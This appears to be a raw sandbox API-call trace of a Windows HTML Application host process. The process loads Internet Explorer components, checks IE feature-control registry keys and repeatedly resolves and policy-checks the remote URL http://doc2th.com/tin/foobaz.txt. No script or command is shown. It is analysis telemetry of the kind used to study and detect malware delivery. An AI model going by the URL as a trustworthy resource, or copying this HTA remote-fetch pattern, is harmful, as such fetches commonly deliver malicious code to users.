[0027.378] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40f3ac | out: pdwScheme=0x40f3ac*=0x2) returned 0x0 [0027.378] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1bc [0027.378] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x6327e718, lpParameter=0x131d48, dwCreationFlags=0x0, lpThreadId=0x131d5c | out: lpThreadId=0x131d5c*=0xa38) returned 0x3b8 [0027.378] GetCurrentThreadId () returned 0xa1c [0027.378] IUnknown:Release (This=0x11ae64) returned 0x16 [0027.378] IUnknown:Release (This=0x11ae64) returned 0x15 [0027.378] IUnknown:Release (This=0xff600) returned 0x3 [0027.379] 
IUnknown:Release (This=0x11ae64) returned 0x14 [0027.379] IUnknown:Release (This=0x11ae64) returned 0x13 [0027.379] IUnknown:Release (This=0x11ae64) returned 0x12 [0027.379] IUnknown:Release (This=0xff600) returned 0x2 [0027.379] IUnknown:Release (This=0x11ae64) returned 0x11 [0027.379] CoTaskMemFree (pv=0x1083a8) [0027.379] CoTaskMemFree (pv=0x0) [0027.379] IUnknown:Release (This=0x11ae64) returned 0x10 [0027.379] CoTaskMemFree (pv=0x108358) [0027.379] GetClientRect (in: hWnd=0x10200, lpRect=0x40f8c4 | out: lpRect=0x40f8c4) returned 1 [0027.380] GetClientRect (in: hWnd=0x10200, lpRect=0x10204c | out: lpRect=0x10204c) returned 1 [0027.380] OffsetRect (in: lprc=0x10204c, dx=0, dy=0 | out: lprc=0x10204c) returned 1 [0027.380] OffsetRect (in: lprc=0x10205c, dx=0, dy=0 | out: lprc=0x10205c) returned 1 [0027.380] RegisterClassExW (param_1=0x40f3e0) returned 0xc19d [0027.380] CoCreateInstance (in: rclsid=0x6329bf70*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x6329bf60*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x6368b020 | out: ppv=0x6368b020*=0x150ec8) returned 0x0 [0027.466] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x150ec8, aaClassList=0x40f4d8*=0xc19d, uSize=0x1) returned 0x0 [0027.466] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc19d, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x10200, hMenu=0x0, hInstance=0x63150000, lpParam=0x121030) returned 0x10204 [0027.467] GetWindowLongW (hWnd=0x10204, nIndex=-20) returned 0 [0027.467] SetWindowLongW (hWnd=0x10204, nIndex=-21, dwNewLong=1183792) returned 0 [0027.467] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x81, wParam=0x0, lParam=0x40f0c0*=1183792, plResult=0x40ef4c | out: 
plResult=0x40ef4c) returned 0x1 [0027.467] DefWindowProcW (hWnd=0x10204, Msg=0x81, wParam=0x0, lParam=0x40f0c0) returned 0x1 [0027.467] GetCurrentThreadId () returned 0xa1c [0027.467] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.467] GetCurrentThreadId () returned 0xa1c [0027.467] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.467] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x1, wParam=0x0, lParam=0x40f0c0*=1183792, plResult=0x40ef4c | out: plResult=0x40ef4c) returned 0x1 [0027.467] DefWindowProcW (hWnd=0x10204, Msg=0x1, wParam=0x0, lParam=0x40f0c0) returned 0x0 [0027.467] GetCurrentThreadId () returned 0xa1c [0027.467] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.467] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x40ef9c | out: plResult=0x40ef9c) returned 0x1 [0027.467] DefWindowProcW (hWnd=0x10204, Msg=0x5, wParam=0x0, lParam=0x24b0428) returned 0x0 [0027.467] GetCurrentThreadId () returned 0xa1c [0027.467] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.467] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x40ef9c | out: plResult=0x40ef9c) returned 0x1 [0027.467] DefWindowProcW (hWnd=0x10204, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0027.467] GetCurrentThreadId () returned 0xa1c [0027.467] DefWindowProcW (hWnd=0x10200, Msg=0x210, wParam=0x1, lParam=0x10204) returned 0x0 [0027.467] GetClassNameW (in: hWnd=0x10200, lpClassName=0x40f4e0, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34 [0027.467] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1 [0027.467] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x150ec8, fRestoreLayout=1) returned 0x0 [0027.467] SendMessageW (hWnd=0x10204, 
Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0027.467] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.467] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x40f39c | out: plResult=0x40f39c) returned 0x1 [0027.467] DefWindowProcW (hWnd=0x10204, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0027.467] GetCurrentThreadId () returned 0xa1c [0027.467] IntersectRect (in: lprcDst=0x40f714, lprcSrc1=0x10204c, lprcSrc2=0x10205c | out: lprcDst=0x40f714) returned 1 [0027.467] EqualRect (lprc1=0x40f714, lprc2=0x10204c) returned 1 [0027.468] InvalidateRect (hWnd=0x10204, lpRect=0x0, bErase=1) returned 1 [0027.469] IntersectRect (in: lprcDst=0x40f600, lprcSrc1=0x40f600, lprcSrc2=0x40f598 | out: lprcDst=0x40f600) returned 1 [0027.469] IntersectRect (in: lprcDst=0x40f600, lprcSrc1=0x40f600, lprcSrc2=0x40f598 | out: lprcDst=0x40f600) returned 1 [0027.584] GetCurrentThreadId () returned 0xa1c [0027.585] GetCurrentThreadId () returned 0xa1c [0027.585] GetCurrentThreadId () returned 0xa1c [0027.585] IntersectRect (in: lprcDst=0x40f43c, lprcSrc1=0x40f43c, lprcSrc2=0x40f40c | out: lprcDst=0x40f43c) returned 1 [0027.585] IntersectRect (in: lprcDst=0x15b018, lprcSrc1=0x15b018, lprcSrc2=0x40f42c | out: lprcDst=0x15b018) returned 1 [0027.585] SetWindowPos (hWnd=0x10204, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1 [0027.585] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.585] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x46, wParam=0x0, lParam=0x40f6f8*=66052, plResult=0x40f5a8 | out: plResult=0x40f5a8) returned 0x1 [0027.585] DefWindowProcW (hWnd=0x10204, Msg=0x46, wParam=0x0, lParam=0x40f6f8) returned 0x0 [0027.585] GetCurrentThreadId () returned 0xa1c [0027.585] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.585] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: 
This=0x150ec8, hWnd=0x10204, msg=0x47, wParam=0x0, lParam=0x40f6f8*=66052, plResult=0x40f5a8 | out: plResult=0x40f5a8) returned 0x1 [0027.585] DefWindowProcW (hWnd=0x10204, Msg=0x47, wParam=0x0, lParam=0x40f6f8) returned 0x0 [0027.585] GetCurrentThreadId () returned 0xa1c [0027.585] SetTimer (hWnd=0x10204, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0027.585] GetFocus () returned 0x0 [0027.585] EnumChildWindows (hWndParent=0x10204, lpEnumFunc=0x63470a73, lParam=0x40f5ec) returned 0 [0027.598] GetFocus () returned 0x0 [0027.598] SetFocus (hWnd=0x10204) returned 0x0 [0027.598] DefWindowProcW (hWnd=0x10200, Msg=0x46, wParam=0x0, lParam=0x40f680) returned 0x0 [0027.598] DefWindowProcW (hWnd=0x101fc, Msg=0x46, wParam=0x0, lParam=0x40f680) returned 0x0 [0027.598] DefWindowProcW (hWnd=0x10202, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0027.598] DefWindowProcW (hWnd=0x10200, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0027.598] DefWindowProcW (hWnd=0x101fc, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0027.598] DefWindowProcW (hWnd=0x10200, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0027.598] DefWindowProcW (hWnd=0x10200, Msg=0xd, wParam=0x104, lParam=0x22c5f8) returned 0x0 [0027.599] DefWindowProcW (hWnd=0x10200, Msg=0xd, wParam=0x104, lParam=0x22c6a0) returned 0x0 [0027.615] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.615] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x726e0000 [0027.742] GetProcAddress (hModule=0x726e0000, lpProcName="LresultFromObject") returned 0x726e2663 [0027.742] LresultFromObject () returned 0xc108 [0027.750] GetCurrentThreadId () returned 0xa1c [0027.753] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.753] GetKeyState (nVirtKey=1) returned 0 [0027.753] GetKeyState (nVirtKey=2) returned 0 [0027.753] GetKeyState (nVirtKey=16) returned 0 [0027.753] GetKeyState (nVirtKey=17) returned 0 [0027.753] GetKeyState (nVirtKey=4) returned 0 [0027.753] GetKeyState (nVirtKey=18) 
returned 0 [0027.753] GetMessageTime () returned 0 [0027.753] GetMessagePos () returned 0x0 [0027.753] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x281, wParam=0x1, lParam=0xc000000f*=0, plResult=0x40efdc | out: plResult=0x40efdc) returned 0x0 [0027.754] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.754] GetKeyState (nVirtKey=1) returned 0 [0027.754] GetKeyState (nVirtKey=2) returned 0 [0027.754] GetKeyState (nVirtKey=16) returned 0 [0027.754] GetKeyState (nVirtKey=17) returned 0 [0027.754] GetKeyState (nVirtKey=4) returned 0 [0027.754] GetKeyState (nVirtKey=18) returned 0 [0027.754] GetMessageTime () returned 0 [0027.754] GetMessagePos () returned 0x0 [0027.754] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x40ea34 | out: plResult=0x40ea34) returned 0x0 [0027.754] GetCurrentThreadId () returned 0xa1c [0027.754] GetCurrentThreadId () returned 0xa1c [0027.754] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.755] GetKeyState (nVirtKey=1) returned 0 [0027.755] GetKeyState (nVirtKey=2) returned 0 [0027.755] GetKeyState (nVirtKey=16) returned 0 [0027.755] GetKeyState (nVirtKey=17) returned 0 [0027.755] GetKeyState (nVirtKey=4) returned 0 [0027.755] GetKeyState (nVirtKey=18) returned 0 [0027.755] GetMessageTime () returned 0 [0027.755] GetMessagePos () returned 0x0 [0027.755] GetCursorPos (in: lpPoint=0x40f188 | out: lpPoint=0x40f188*(x=1248, y=501)) returned 1 [0027.755] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f188 | out: lpPoint=0x40f188) returned 1 [0027.755] GetKeyState (nVirtKey=16) returned 0 [0027.755] GetKeyState (nVirtKey=17) returned 0 [0027.755] GetKeyState (nVirtKey=18) returned 0 [0027.755] GetKeyState (nVirtKey=160) returned 0 [0027.755] GetKeyState (nVirtKey=162) returned 0 [0027.755] GetKeyState (nVirtKey=164) returned 0 [0027.755] GetCursorPos (in: lpPoint=0x40f188 | out: 
lpPoint=0x40f188*(x=1248, y=501)) returned 1 [0027.755] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f188 | out: lpPoint=0x40f188) returned 1 [0027.755] GetKeyState (nVirtKey=16) returned 0 [0027.755] GetKeyState (nVirtKey=17) returned 0 [0027.755] GetKeyState (nVirtKey=18) returned 0 [0027.755] GetKeyState (nVirtKey=160) returned 0 [0027.755] GetKeyState (nVirtKey=162) returned 0 [0027.755] GetKeyState (nVirtKey=164) returned 0 [0027.755] GetCapture () returned 0x0 [0027.758] GetCurrentThreadId () returned 0xa1c [0027.758] GetCurrentThreadId () returned 0xa1c [0027.758] GetCurrentThreadId () returned 0xa1c [0027.758] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x40f3c4 | out: plResult=0x40f3c4) returned 0x1 [0027.758] DefWindowProcW (hWnd=0x10204, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0027.758] GetCurrentThreadId () returned 0xa1c [0027.759] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x150ec8, hWnd=0x10204, phIMC=0x40f6cc | out: phIMC=0x40f6cc*=0x60133) returned 0x0 [0027.759] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x150ec8, hWnd=0x10204, hIME=0x0, phPrev=0x40f6cc | out: phPrev=0x40f6cc*=0x60133) returned 0x0 [0027.759] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.759] GetKeyState (nVirtKey=1) returned 0 [0027.759] GetKeyState (nVirtKey=2) returned 0 [0027.759] GetKeyState (nVirtKey=16) returned 0 [0027.759] GetKeyState (nVirtKey=17) returned 0 [0027.759] GetKeyState (nVirtKey=4) returned 0 [0027.759] GetKeyState (nVirtKey=18) returned 0 [0027.759] GetMessageTime () returned 0 [0027.759] GetMessagePos () returned 0x0 [0027.759] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x281, wParam=0x0, lParam=0xc000000f*=0, plResult=0x40f3bc | out: plResult=0x40f3bc) returned 0x0 [0027.759] GetCurrentThreadId () returned 0xa1c [0027.759] GetWindowLongW (hWnd=0x10204, 
nIndex=-21) returned 1183792 [0027.760] GetKeyState (nVirtKey=1) returned 0 [0027.760] GetKeyState (nVirtKey=2) returned 0 [0027.760] GetKeyState (nVirtKey=16) returned 0 [0027.760] GetKeyState (nVirtKey=17) returned 0 [0027.760] GetKeyState (nVirtKey=4) returned 0 [0027.760] GetKeyState (nVirtKey=18) returned 0 [0027.760] GetMessageTime () returned 0 [0027.760] GetMessagePos () returned 0x0 [0027.760] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x281, wParam=0x1, lParam=0xc000000f*=0, plResult=0x40f3bc | out: plResult=0x40f3bc) returned 0x0 [0027.760] GetCurrentThreadId () returned 0xa1c [0027.760] IsOS (dwOS=0x25) returned 1 [0027.760] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f5c0 | out: phkResult=0x40f5c0*=0x3f4) returned 0x0 [0027.760] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f5c4 | out: phkResult=0x40f5c4*=0x3f8) returned 0x0 [0027.760] RegOpenKeyExW (in: hKey=0x3f8, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x40f580 | out: phkResult=0x40f580*=0x0) returned 0x2 [0027.760] RegOpenKeyExW (in: hKey=0x3f4, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x40f580 | out: phkResult=0x40f580*=0x3fc) returned 0x0 [0027.760] SHRegGetValueW () returned 0x0 [0027.760] RegCloseKey (hKey=0x3fc) returned 0x0 [0027.760] RegCloseKey (hKey=0x0) returned 0x6 [0027.760] RegCloseKey (hKey=0x0) returned 0x6 [0027.760] RegCloseKey (hKey=0x3f4) returned 0x0 [0027.760] RegCloseKey (hKey=0x3f8) returned 0x0 [0027.760] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x6d270000 [0028.223] GetVersionExW (in: lpVersionInformation=0x40f0cc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, 
dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x40f0cc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0028.223] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x6d270000 [0028.224] LoadStringW (in: hInstance=0x6d270000, uID=0xb5, lpBuffer=0x40f648, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0028.225] LoadStringW (in: hInstance=0x6d270000, uID=0xb5, lpBuffer=0x40f6a8, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0028.225] LoadStringW (in: hInstance=0x6d270000, uID=0xb5, lpBuffer=0x40f694, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0028.225] ShowWindow (hWnd=0x10204, nCmdShow=1) returned 1 [0028.225] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0028.225] TranslateMessage (lpMsg=0x40f904) returned 0 [0028.225] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0028.240] RegisterDragDrop (hwnd=0x10204, pDropTarget=0x636896cc) returned 0x0 [0028.240] GetCurrentThreadId () returned 0xa1c [0028.240] GetCurrentThreadId () returned 0xa1c [0028.240] GetCurrentThreadId () returned 0xa1c [0028.240] GetCurrentThreadId () returned 0xa1c [0028.241] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0028.241] TranslateMessage (lpMsg=0x40f904) returned 0 [0028.241] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0028.241] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0028.241] KillTimer (hWnd=0x10204, uIDEvent=0x1000) returned 1 [0028.245] IUnknown:AddRef (This=0x11ae64) returned 0x11 [0028.245] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40ec3c | out: pdwScheme=0x40ec3c*=0x2) returned 0x0 [0028.245] IUri:GetDisplayUri (in: This=0x11ae64, pbstrDisplayString=0x40ec48 | out: 
pbstrDisplayString=0x40ec48*="http://doc2th.com/tin/foobaz.txt") returned 0x0 [0028.246] GetWindowTextW (in: hWnd=0x10200, lpString=0x40e7e8, nMaxCount=512 | out: lpString="") returned 0 [0028.246] DefWindowProcW (hWnd=0x10200, Msg=0xd, wParam=0x200, lParam=0x40e7e8) returned 0x0 [0028.246] SetWindowTextW (hWnd=0x10200, lpString="http://doc2th.com/tin/foobaz.txt") returned 1 [0028.246] DefWindowProcW (hWnd=0x10200, Msg=0xc, wParam=0x0, lParam=0x12cffc) returned 0x1 [0028.246] IUnknown:Release (This=0x11ae64) returned 0x10 [0028.246] GetCurrentThreadId () returned 0xa1c [0028.246] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0028.507] TranslateMessage (lpMsg=0x40f904) returned 0 [0028.507] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0028.507] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0032.274] TranslateMessage (lpMsg=0x40f904) returned 0 [0032.274] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0032.274] DefWindowProcW (hWnd=0x10202, Msg=0xc07b, wParam=0x50, lParam=0x0) returned 0x0 [0032.274] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0032.274] TranslateMessage (lpMsg=0x40f904) returned 0 [0032.274] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0032.274] DefWindowProcW (hWnd=0x101fc, Msg=0xc07b, wParam=0x50, lParam=0x0) returned 0x0 [0032.275] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0032.284] TranslateMessage (lpMsg=0x40f904) returned 0 [0032.284] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0032.284] DefWindowProcW (hWnd=0x10202, Msg=0xc07b, wParam=0x50, lParam=0x0) returned 0x0 [0032.284] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0032.285] TranslateMessage (lpMsg=0x40f904) returned 0 [0032.285] 
DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0032.285] DefWindowProcW (hWnd=0x101fc, Msg=0xc07b, wParam=0x50, lParam=0x0) returned 0x0 [0032.285] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0045.075] TranslateMessage (lpMsg=0x40f904) returned 0 [0045.075] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0045.075] CreateUri (in: pwzURI="http://doc2th.com/tin/foobaz.txt", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x40e07c | out: ppURI=0x40e07c*=0x11ae64) returned 0x0 [0045.075] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40e054 | out: ppvObject=0x40e054*=0x11ae64) returned 0x0 [0045.075] IUnknown:Release (This=0x11ae64) returned 0x12 [0045.075] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0045.075] IUnknown:Release (This=0x11ae64) returned 0x12 [0045.075] IUnknown:Release (This=0x11ae64) returned 0x11 [0045.075] FindResourceW (hModule=0x6d270000, lpName=0x1fe, lpType=0x6) returned 0x27e84d0 [0045.075] LoadResource (hModule=0x6d270000, hResInfo=0x27e84d0) returned 0x280e53c [0045.076] LockResource (hResData=0x280e53c) returned 0x280e53c [0045.076] VirtualQuery (in: lpAddress=0x280e53c, lpBuffer=0x40f224, dwLength=0x1c | out: lpBuffer=0x40f224*(BaseAddress=0x280e000, AllocationBase=0x2530000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0045.076] SizeofResource (hModule=0x6d270000, hResInfo=0x27e84d0) returned 0xe6 [0045.076] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0046.562] TranslateMessage (lpMsg=0x40f904) returned 0 [0046.562] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0046.562] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0046.588] 
TranslateMessage (lpMsg=0x40f904) returned 0 [0046.588] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0046.588] GetTickCount () returned 0x1a717 [0046.588] ParseURLW (in: pcszURL="http://doc2th.com/tin/foobaz.txt", ppu=0x40f3e0 | out: ppu=0x40f3e0) returned 0x0 [0046.590] GetTickCount () returned 0x1a717 [0046.590] GetTickCount () returned 0x1a717 [0046.590] SetTimer (hWnd=0x10204, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0046.590] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0046.590] IInternetSecurityManager:MapUrlToZone (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pdwZone=0x40f39c, dwFlags=0x0 | out: pdwZone=0x40f39c*=0xffffffff) returned 0x800c0011 [0046.590] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.590] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.590] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0046.590] IInternetSecurityManager:ProcessUrlAction (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", dwAction=0x2106, pPolicy=0x40f3a0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x40f3a0*=0x0) returned 0x0 [0046.590] IUnknown:Release (This=0x11ae64) returned 0x12 [0046.590] ParseURLW (in: pcszURL="http://doc2th.com/tin/foobaz.txt", ppu=0x40f528 | out: ppu=0x40f528) returned 0x0 [0046.590] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0046.590] IInternetSecurityManager:MapUrlToZone (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pdwZone=0x40f4cc, dwFlags=0x0 | out: pdwZone=0x40f4cc*=0xffffffff) returned 0x800c0011 [0046.590] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.590] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.590] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0046.591] IInternetSecurityManager:ProcessUrlAction (in: This=0x636896bc, 
pwszUrl="http://doc2th.com/tin/foobaz.txt", dwAction=0x1400, pPolicy=0x40f4d0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x40f4d0*=0x0) returned 0x0 [0046.591] IUnknown:Release (This=0x11ae64) returned 0x12 [0046.591] GetTickCount () returned 0x1a717 [0046.591] Sleep (dwMilliseconds=0x0) [0046.592] GetTickCount () returned 0x1a717 [0046.592] GetTickCount () returned 0x1a717 [0046.592] ParseURLW (in: pcszURL="http://doc2th.com/tin/foobaz.txt", ppu=0x40f4e4 | out: ppu=0x40f4e4) returned 0x0 [0046.592] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0046.592] IInternetSecurityManager:MapUrlToZone (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pdwZone=0x40f484, dwFlags=0x0 | out: pdwZone=0x40f484*=0xffffffff) returned 0x800c0011 [0046.592] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.592] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.592] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0046.592] IInternetSecurityManager:ProcessUrlAction (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", dwAction=0x1400, pPolicy=0x40f488, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x40f488*=0x0) returned 0x0 [0046.592] IUnknown:Release (This=0x11ae64) returned 0x12 [0046.592] ParseURLW (in: pcszURL="http://doc2th.com/tin/foobaz.txt", ppu=0x40f474 | out: ppu=0x40f474) returned 0x0 [0046.592] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0046.592] IInternetSecurityManager:MapUrlToZone (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pdwZone=0x40f414, dwFlags=0x0 | out: pdwZone=0x40f414*=0xffffffff) returned 0x800c0011 [0046.592] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.592] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.592] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 
